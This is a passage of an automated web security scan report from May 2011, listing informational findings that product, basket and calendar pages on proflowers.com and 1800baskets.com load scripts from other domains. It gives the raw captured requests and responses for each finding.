AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:18:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:18:27 GMT
Content-Length: 136888


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</script>

       
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
17.12. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:27 GMT
Content-Length: 139819


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</script>

       
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
17.13. http://ww30.1800baskets.com/deliverycalendarnew.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /deliverycalendarnew.do

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /deliverycalendarnew.do?month=5&year=2011&locationType=1&itemCount=1&prodType=GPT&productPrice=29.99&zip=10010&country=&productSKU=93260&contextPageType=PRODUCT&isGeoSell=false&field=deliveryDate&baseCode=93260&nextMonthAvailableCheck=true&page=product HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Origin: http://ww30.1800baskets.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903453756&t4=1304903443093&lti=1304903453755&ln=sd&hr=javascript%3AcheckNShowAppParamLightBoxCalendar%28deliveryDate%2Ctrue%29%3B&fti=&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=&fd=&uer=&fu=&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:18:13 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00001N288SgFQQcgjdh8LBTc6IT:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 52934


<html>
<head>    
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/baskets/flowers_enterprise_apr1.css"/>

<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>
...[SNIP]...
17.14. http://ww30.1800baskets.com/product.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /product.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /product.do?baseCode=93260&dataset=11309 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/template.do?id=template3&page=2000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.1.10.1304903358; cmTPSet=Y; CMAVID=70091303843240316067555; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903358829&t2=1304903368545&t3=1304903441095&lti=1304903441095&ln=&hr=/product.do%3FbaseCode%3D93260%26dataset%3D11309&fti=&fn=searchform%3A0%3BUNDEFINED%3A1%3B&ac=&fd=&uer=&fu=&pi=18B%3Atemplate-The%20Popcorn%20Factory&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800baskets.com/template.do%3Fid%3Dtemplate3%26page%3D2000&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:17:19 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 83726


                                                <html xmlns="http://www.w3.org/1999/xhtml"
    xmlns:og="http://ogp.me/ns#"
    xmlns:fb="http://www.face
...[SNIP]...
</style>
<script src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=rotate&amp;publisher=a396cc33-4aff-4879-b5e0-d9ab5133031a&amp;headerbg=%23669933&amp;linkfg=%23663399&amp;offsetLeft=-155&amp;embeds=true&amp;button=false&amp;onmouseover=false" type="text/javascript"></script>
...[SNIP]...
</div>    
    <script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/dropdowntabs_v3.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>
<script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/thirdparty_merged_mday1.js"></script>
<script type="text/javascript" src="http://media6.1800flowers.com/800f_assets/jet/website/scripts/flowers/product_apr7.js"></script>
<script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/calendar/date.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://media5.1800flowers.com/800f_assets/jet/website/scripts/flowers/martha-tab_aug2.js"></script>
...[SNIP]...
</script>


                                       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
<!-- Mercent Tag Start -->

<script src="https://cdn.mercent.com/js/tracker.js"
   type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/cmcustom.js"></script>
...[SNIP]...
</script>


   <script language="javascript1.1" src="http://media2.1800flowers.com/800f_assets/jet/website/scripts/flowers/livePerson/800-chat-sales-english_mtagconfig.js" type="text/javascript"></script>
...[SNIP]...
17.15. http://ww30.1800baskets.com/shoppingbasket.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /shoppingbasket.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903458838&t4=1304903443093&lti=1304903458838&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304903458845&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A22%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=0000a4jGFqAQQsPqkpo4AlBHArV:-1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:18:26 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000elBrn4hw6Blclz2pBq53Rgi:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 146143


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<body onload='setDeliveryDates()'>

<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>
<script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/thirdparty_merged_mday1.js"></script>
...[SNIP]...
</div>    
    <script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/dropdowntabs_v3.js"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/cmcustom.js"></script>
...[SNIP]...
</script>


   <script language="javascript1.1" src="http://media2.1800flowers.com/800f_assets/jet/website/scripts/flowers/livePerson/800-chat-sales-english_mtagconfig.js" type="text/javascript"></script>
...[SNIP]...
17.16. http://ww30.1800baskets.com/template.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /template.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /template.do?id=template3&page=2000 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:16:16 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Set-Cookie: JSESSIONID=0000dNGqKXu-V4E9FonaYphG7gq:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 37878


<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">


<title></title>
<meta name="description" content="ThePopco
...[SNIP]...
</div>    
    <script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/dropdowntabs_v3.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/cmcustom.js"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
<!-- pageid END -->


